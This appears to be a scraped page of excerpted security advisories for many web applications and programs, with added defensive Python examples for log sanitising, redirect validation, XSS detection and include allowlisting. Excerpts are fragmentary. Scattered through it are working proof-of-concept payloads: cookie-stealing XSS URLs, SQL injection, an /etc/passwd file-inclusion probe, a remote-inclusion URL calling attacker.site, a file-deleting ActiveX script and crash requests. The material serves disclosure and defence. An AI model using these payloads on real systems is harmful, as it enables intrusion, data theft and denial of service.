Proof of Concept

[MORNINGSTAR-2009-02] Multiple security issues in Cute News and UTF-8 Cute News

------------------------------------------------------------------------------------------------------------------------
These vulnerabilities were discovered and researched by Andrew Horton 
(urbanadventurer) from MorningStar Security.


8. Technical Description / Proof of Concept
------------------------------------------------------------------------------------------------------------------------

8.1 Introduction

Many past advisories have been published for Cute News. An unpatched LFI 

Open-Xchange Security Advisory 2013-03-13

Steps to reproduce:
1. Generate a POST request that breaks the JSON string while sending an E-Mail
2. Within that request, embed some JS code

Proof of Concept:
<html>
<head>
<title>PoC for Bug 24553 CVE-2013-1646</title>
</head>
<body>

CORE-2009-0827: Microsoft Office Excel / Word OfficeArtSpgr Container Pointer Overwrite Vulnerability

This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies during Bugweek 2009 [1].


8. *Technical Description / Proof of Concept Code*


8.1. *Excel / Word - OfficeArtSpgr container - invalid recType value
leads to attacker controlled pointer usage [MSRC 9368]*


Multiple vulnerabilities in Pligg CMS

1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436

1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator's browser session in the context of the affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 Input passed via the "karma_username" POST parameter to module.php is not properly sanitised before being returned to the user.

Nero MediaHome Multiple Remote DoS Vulnerabilities

        0x7c9216a1 call 0x7c920684
        0x7c9216a6 mov eax,[ebp+0xc]
        0x7c9216a9 mov ecx,[ebp+0x8]


Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:

GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*

[MORNINGSTAR-2009-01] Multiple security issues in Open Auto Classifieds version <= 1.5.9

----------------------------------------------------------------------------------------------
These vulnerabilities were discovered and researched by Andrew Horton 
(urbanadventurer) from MorningStar Security.


8. Technical Description / Proof of Concept
----------------------------------------------------------------------------------------------

8.1 Introduction

Open Auto Classifieds powers many car dealer websites. No advisories for 

CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software

*Credits*
This vulnerability was discovered by Lucas Lavarello from the CORE
Security Consulting Services (CORE SCS) team.

*Technical Description / Proof of Concept Code*

The standard protocol that AIM clients use to communicate is called OSCAR
(Open System for CommunicAtion in Realtime), which is a closed protocol
also used by AOL's secondary Instant Messaging client, ICQ (I Seek You).
On top of the OSCAR protocol, AIM clients have implemented support for

Multiple XSS vulnerabilities in All-in-One Event Calendar Plugin for WordPress

1) Cross-Site Scripting (XSS) in All-in-One Event Calendar Plugin for WordPress: CVE-2012-1835

1.1 Input passed via the "title" GET parameter to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user's browser session in the context of the affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 Input passed via the "args", "title", "before_title", "after_title" GET parameters to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user's browser session in the context of the affected website.

Multiple vulnerabilities in LEPTON

1) Local File Inclusion in LEPTON: CVE-2012-0998

Input passed via the "language" POST parameter to /account/preferences.php is not properly verified before being saved in $_SESSION['language'] when user updates preferences.
Thereafter $_SESSION['language'] is used in include() function and can be exploited to include arbitrary local files via directory traversal and URL-encoded NULL bytes. 

The following PoC (Proof of Concept) demonstrates the vulnerability:


POST /account/preferences.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded


Multiple vulnerabilities in OrangeHRM

1) SQL Injection in OrangeHRM: CVE-2012-1506

1.1 Input passed via the "hspSummaryId" GET parameter to /plugins/ajaxCalls/haltResumeHsp.php is not properly sanitised before being used in SQL "UPDATE" query. This vulnerability can be exploited by time-based blind SQL injection techniques to reveal sensitive information from the database. 

The following PoC (Proof of Concept) will cause a delay of the script execution if MySQL server version is 5.*: 

http://[host]/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,ENCODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202

Successful exploitation of this vulnerability requires attacker to be registered and logged-in.


[Kil13r-SA-20100513] Adobe Flash Player 10.0 Denial Of Service Vulnerability

O 0  LastErr 00000000 ERROR_SUCCESS
EFL 00250202 (NO,NB,NE,A,NS,PO,GE,G)
...

The rest is omitted.
For more information see Proof of Concept screen shot.

Proof of Concept code:
http://www.kil13r.info/data/aaa.zip

Proof of Concept screen shot:

Multiple XSS in Dotclear

1) Cross-Site Scripting (XSS) in Dotclear: CVE-2012-1039

1.1 Input passed via the "login_data" POST parameter to /admin/auth.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:


<form action="http://[host]/admin/auth.php" method="post">
<input type="hidden" name="new_pwd" value="1" />
<input type="hidden" name="new_pwd_c" value="2" />

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

C) "Cherokee" log escape sequence injection

The following Proof Of Concept can be used in order to verify the
vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
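The PoCs in this advisory differ only in how the escape sequence reaches the log: nc writes the raw bytes into the request line, while curl sends them percent-encoded and relies on the server (or a later log viewer) to decode them. The Python below is an added example, not code from the advisory, that applies both views to constructed access-log lines: it flags lines that carry control bytes directly, flags request targets that hide them behind %xx, and rewrites control bytes as visible \xNN escapes before a line is printed to a terminal. The sample log lines, addresses and user agents are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined format).  Line 1 is what a server that
# writes the request line verbatim records for the nc PoC; line 2 is the curl PoC
# as logged by a server that keeps the target percent-encoded; line 3 is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Oct/2009:12:00:00 +0000] "GET /\x1b]2;owned?\x07 HTTP/1.1" 400 0 "-" "-"',
    '10.0.0.5 - - [13/Oct/2009:12:00:01 +0000] "GET /%1b%5d%32%3b%6f%77%6e%65%64%07%0a HTTP/1.1" 404 169 "-" "curl/7.19.7"',
    '10.0.0.6 - - [13/Oct/2009:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
]

# C0 controls, DEL and the C1 range: everything a terminal may interpret as an
# escape or control sequence, none of which belongs in a log line.
CONTROL = re.compile(r"[\x00-\x1f\x7f\x80-\x9f]")
REQUEST_TARGET = re.compile(r'"[A-Z]+ (\S+) HTTP/')


def contains_terminal_control(line: str) -> bool:
    """True if the stored line itself carries control bytes (the nc case)."""
    return CONTROL.search(line) is not None


def decoded_request_has_controls(line: str) -> bool:
    """True if the request target hides control bytes behind %xx (the curl case);
    a viewer or log parser that percent-decodes would release them."""
    m = REQUEST_TARGET.search(line)
    return m is not None and CONTROL.search(unquote(m.group(1))) is not None


def sanitize_log_line(line: str) -> str:
    """Render control bytes as visible \\xNN escapes before the line reaches a TTY."""
    return CONTROL.sub(lambda m: "\\x%02x" % ord(m.group(0)), line)


def triage(lines):
    """Per-line verdict suitable for an alert: raw-control, encoded-control or clean."""
    verdicts = []
    for line in lines:
        if contains_terminal_control(line):
            verdicts.append("raw-control")
        elif decoded_request_has_controls(line):
            verdicts.append("encoded-control")
        else:
            verdicts.append("clean")
    return verdicts


if __name__ == "__main__":
    for verdict, line in zip(triage(SAMPLE_LOG), SAMPLE_LOG):
        print(verdict, sanitize_log_line(line))
```

The sanitizer is what a log viewer (or a `tail -f` wrapper) should apply; the triage function is the detection side, and the encoded-control case matters because a server that stores %1b is safe only until something in the pipeline decodes it.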

D) "thttpd" log escape sequence injection

Multiple vulnerabilities in AContent

1) SQL Injection in AContent: CVE-2012-5167

1.1 The vulnerability exists due to insufficient sanitisation of input data in the "field" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in the application's database.

The following PoC (Proof of Concept) demonstrates the vulnerability:


<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" />
<input type="hidden" name="value" value="1" />

Multiple Vulnerabilities in LibreOffice

vcllo!Region::operator=+0x12:
6b44f247 ff4004 inc dword ptr [eax+4] ds:0023:6cd6e986=db4a6001



Proof of Concept
Please see the attached file: HTB23106-LibreOffice-3.5.5.3.rar (https://www.htbridge.com/advisory/HTB23106-LibreOffice-3.5.5.3.rar)
Password: high-tech-bridge


1.2     Null pointer dereference error was found in svxcorelo.dll while processing the ODG (Drawing document) files. A remote attacker can create a specially crafted ODG file, trick a user into opening that file and terminate the application. 

Firefly MediaServer Multiple Remote DoS Vulnerabilities

        0x0041e237 mov dl,[eax]
        0x0041e239 inc eax
        0x0041e23a cmp dl,bl


Proof of Concept:
The following HTTP request will crash the vulnerable Firefly server remotely:

GET / HTTP/1.1
Host: vulnhost.local
User-Agent: Mozilla/5.0 (Windows; U)

CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

7. *Credits*

This vulnerability was discovered by Nicolas Economou from Core Security
Technologies. Technical analysis and proof-of-concept tools were
developed by Nicolas Economou and Diego Juarez from Core's Exploit
Writers Team.


8. *Technical Description / Proof of Concept Code*

CORE-2010-0514: XnView MBM Processing Heap Overflow

Olea and Nahuel Riva from Core Security Technologies. Publication of
this advisory was coordinated by Carlos Sarraute from Core Security
Advisories team.


8. *Technical Description / Proof of Concept Code*

XnView is prone to a security vulnerability when processing MBM files.
The version used in our tests is XnView 1.97.4 running on Windows 2000
SP4. By enticing the user of XnView to open a specially crafted file, a
remote attacker may exploit this vulnerability to gain arbitrary code

CORE-2009-0813: Windows Movie Maker and Microsoft Producer IsValidWMToolsStream() Heap Overflow

This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies during Bugweek 2009 [1].


8. *Technical Description / Proof of Concept Code*

An exploitable vulnerability was found in Windows Movie Maker, which can
be triggered by a remote attacker by sending a specially crafted .MSWMM
file and enticing the user to open it. This vulnerability results in a
write access violation and can lead to remote code execution.

TWSL2012-002: Multiple Vulnerabilities in WordPress

After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor.  In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance

Lighttpd Proof of Concept code for CVE-2011-4362

--- CUT ---

The first column is the offset, so the vulnerability is triggered as it should be
(negative offsets). The second column is the byte that is read out of bounds.

How to run this very primitive Proof of Concept?

$ gcc p_cve-2011-4362.c -o p_cve-2011-4362
$ ./p_cve-2011-4362 

        ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...

Multiple vulnerabilities in Newscoop

1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933

1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00

1.2 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /conf/install_conf.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.


SEC Consult SA-20071101-0 :: Multiple Vulnerabilities in SonicWALL SSL-VPN Client

The WebCacheCleaner ActiveX Control provides the method FileDelete()
which, working as advertised, allows the attacker to delete arbitrary
files on the client.


=== Proof of Concept 1  (VBScript) ===

dim o
Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1")
o.FileDelete("c:\bla\bla")


CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass

This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Consulting Services (SCS). Additional research
was made by Federico Muttis from Core Security Exploit Writers Team (EWT).


8. *Technical Description / Proof of Concept Code*

 Internet Explorer uses a feature known as URL Security Zones [2], which
defines a set of privileges for Web sites and applications depending on
their apparent level of trustworthiness. The zones available in the
product include:

Jira Enterprise 4.0.1 - Multiple Low Risk Vulnerabilities

Cross Site Script Redirection:
The "returnUrl" GET-request within ViewIssue.jspa is not sanitizing
user-input in a sufficient way allowing the Data URI scheme to be
used in an attack.

Proof of Concept URL:
ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data:text/html,<script>alert(0)</script>
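The returnUrl problem above is a redirect target that accepts any URL scheme, so a data: URI lands script in the user's browser. The Python below is an added example, not Atlassian's code, of the check a redirect parameter should pass before it is used: only a same-origin absolute path is accepted and everything else falls back to a fixed landing page. The default landing page name is an assumption made for the example.

```python
from urllib.parse import urlsplit

DEFAULT_RETURN = "/secure/Dashboard.jspa"   # assumed safe landing page


def safe_return_url(value: str, default: str = DEFAULT_RETURN) -> str:
    """Accept only a same-origin, absolute-path URL for a post-action redirect;
    anything else (data:, javascript:, http://other, //other) falls back to
    `default`."""
    if not value:
        return default
    v = value.strip()
    # Control characters would allow header injection on the Location: line and
    # some browsers treat a backslash as a slash, so both are rejected outright.
    if any(ord(c) < 0x20 or c == "\\" for c in v):
        return default
    parts = urlsplit(v)
    if parts.scheme or parts.netloc:
        return default
    if not v.startswith("/") or v.startswith("//"):
        return default
    return v


if __name__ == "__main__":
    for probe in ("data:text/html,<script>alert(0)</script>", "javascript:alert(0)",
                  "//evil.example/phish", "/browse/ABC-1?filter=1#top"):
        print(repr(probe), "->", safe_return_url(probe))
```

A relative value without a leading slash (ViewIssue.jspa?id=1) is also rejected by this check; if the application needs those, resolve them against the application's own base path server-side rather than relaxing the rule.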


Non-Persistent Script Injection:
The "returnUrl" GET-request within default.jspa is not sanitizing

Multiple vulnerabilities in osCmax

1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664

1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user's browser session in the context of the affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:


<form action="http://[host]/admin/login.php?action=process" method="post" name="main" id="main">
<input type="hidden" name="username" value="'<script>alert(document.cookie);</script>">
<input type="hidden" name="password" value="">
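The reflected XSS entries on this page (Pligg, All-in-One Event Calendar, Dotclear and osCmax above) share one root cause: a request parameter is echoed into HTML without output encoding. The Python below is an added example, not code from any of those projects or advisories. It models PHP's htmlspecialchars() closely enough to classify whether a response reflects a probe raw or encoded, and shows the caveat the osCmax single-quote payload illustrates: htmlspecialchars() without ENT_QUOTES leaves the single quote untouched, so a value echoed into a single-quoted attribute remains exploitable. The form markup is constructed for the example.

```python
import html

# Probe payloads of the kind used in the PoCs above (constructed here): the first
# breaks out of a double-quoted attribute, the second relies on a single quote.
DQ_PAYLOAD = '"><script>alert(document.cookie);</script>'
SQ_PAYLOAD = "'<script>alert(document.cookie);</script>"


def php_htmlspecialchars(value: str, ent_quotes: bool = False) -> str:
    """Model of PHP's htmlspecialchars(): &, <, > and " are always encoded, but
    the single quote only with ENT_QUOTES (the default up to PHP 5.3 was ENT_COMPAT)."""
    out = (value.replace("&", "&amp;").replace("<", "&lt;")
                .replace(">", "&gt;").replace('"', "&quot;"))
    if ent_quotes:
        out = out.replace("'", "&#039;")
    return out


def classify_reflection(body: str, payload: str) -> str:
    """'raw' if the probe came back verbatim (exploitable), 'encoded' if only an
    entity-encoded copy is present, 'absent' if the parameter is not reflected."""
    if payload in body:
        return "raw"
    encoded_forms = (php_htmlspecialchars(payload, True),
                     php_htmlspecialchars(payload, False),
                     html.escape(payload, quote=True))
    if any(form in body for form in encoded_forms):
        return "encoded"
    return "absent"


def attribute_is_safe(encoded_value: str, quote_char: str) -> bool:
    """A reflected attribute value cannot leave its context if neither the
    surrounding delimiter nor a raw '<' survives encoding."""
    return quote_char not in encoded_value and "<" not in encoded_value


# Constructed stand-ins for a vulnerable and a patched login form.
def render_vulnerable(username: str) -> str:
    return f'<input type="text" name="username" value="{username}">'


def render_fixed(username: str) -> str:
    safe = php_htmlspecialchars(username, ent_quotes=True)
    return f'<input type="text" name="username" value="{safe}">'


if __name__ == "__main__":
    print("vulnerable:", classify_reflection(render_vulnerable(DQ_PAYLOAD), DQ_PAYLOAD))
    print("fixed:     ", classify_reflection(render_fixed(DQ_PAYLOAD), DQ_PAYLOAD))
    # ENT_COMPAT leaves the single quote alone, so a single-quoted attribute stays exploitable:
    print("single-quoted, ENT_COMPAT:", attribute_is_safe(php_htmlspecialchars(SQ_PAYLOAD), "'"))
    print("single-quoted, ENT_QUOTES:", attribute_is_safe(php_htmlspecialchars(SQ_PAYLOAD, True), "'"))
```

classify_reflection() only tells you whether encoding happened at all; attribute_is_safe() is the question that actually decides exploitability, because the answer depends on which delimiter encloses the echoed value.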

Multiple vulnerabilities in OpenEMR

1) Multiple Local File Inclusion vulnerabilities in OpenEMR

1.1 Input passed via the "formname" GET parameter to /contrib/acog/print_form.php is not properly verified before being used to include local files. 
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/contrib/acog/print_form.php?formname=../../../etc/passwd%00

1.2 Input passed via the "formname" GET parameter to /interface/patient_file/encounter/load_form.php, /interface/patient_file/encounter/view_form.php and /interface/patient_file/encounter/trend_form.php is not properly verified before being used to include local files. 
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
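LEPTON's "language" parameter, Newscoop's GLOBALS[g_campsiteDir] and the OpenEMR "formname" parameter above all reach include()/require_once() without a check that the value names a file the application intended to load. The Python below is an added example, not code from any of these projects, of the validation such a parameter should pass before it is stored in the session or passed to an include: a strict allowlist on the name, explicit rejection of NUL bytes and URL/UNC prefixes, and a realpath containment check as an independent second guard. The base directory, the file extension and the probe strings are assumptions constructed for the example.

```python
import os
import re

SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_include(base_dir: str, name: str, ext: str = ".php") -> str:
    """Map a user-supplied form/language name to a file under base_dir, or raise.

    The allowlist alone rejects NUL bytes, '/', '\\', '.', ':' and therefore every
    traversal, null-truncation and URL trick; the earlier checks only give a
    specific error, and the realpath containment check is a second guard."""
    if "\x00" in name:
        raise ValueError("NUL byte in include name (null-byte truncation attempt)")
    if "://" in name.lower() or name.startswith(("//", "\\\\")):
        raise ValueError("URL or UNC path in include name (RFI attempt)")
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("include name outside the allowed character set")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name + ext))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("include resolves outside the include directory (LFI attempt)")
    return candidate


def safe_include(base_dir: str, name: str, fallback: str = "default") -> str:
    """Never let a bad value through to include(): fall back to a known file
    and leave the rejection for the log."""
    try:
        return resolve_include(base_dir, name)
    except ValueError:
        return resolve_include(base_dir, fallback)


def is_rejected(base_dir: str, name: str) -> bool:
    try:
        resolve_include(base_dir, name)
        return False
    except ValueError:
        return True


# Constructed probes: advisory-style payloads plus a legitimate name.
PROBES = ["acog_form", "../../../etc/passwd\x00", "http://attacker.site/file\x00",
          "../../../../etc/passwd", "/etc/passwd"]

if __name__ == "__main__":
    for probe in PROBES:
        try:
            print(repr(probe), "->", resolve_include("/var/www/app/forms", probe))
        except ValueError as exc:
            print(repr(probe), "-> rejected:", exc)
```

The realpath check on its own would not catch the RFI case (base/http:/attacker.site/file resolves inside the base directory), which is why the scheme check and the allowlist come first; conversely, the allowlist makes the containment check redundant, which is the point of keeping it: a later relaxation of the pattern does not silently reopen traversal.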

[HISPASEC] 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573) multiple FTP-based vulnerabilities

Since more than enough \..\..\ will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can
for example overwrite a critical system file, or create a file in the Autostart
folder.

See Proof of Concept exploit at the bottom of this advisory.


2. Remote FTP DoS
When connecting to a malicious (malformed) FTP server, Unreal Commander sends a CWD /
command. If that server replies with a "550 CWD Operation not permitted"

CORE-2009-0122: HP OpenView Buffer Overflows

These vulnerabilities were discovered and researched by Oren Isacson
from Core Security Technologies.


7. *Technical Description / Proof of Concept Code*

Several buffer overflows have been found in HP OpenView Network Node
Manager, which can be exploited to remotely compromise a user's system.

While working on an exploit for the vulnerabilities disclosed in the

Copyright © 1995-2013 LinuxRocket.net. All rights reserved.
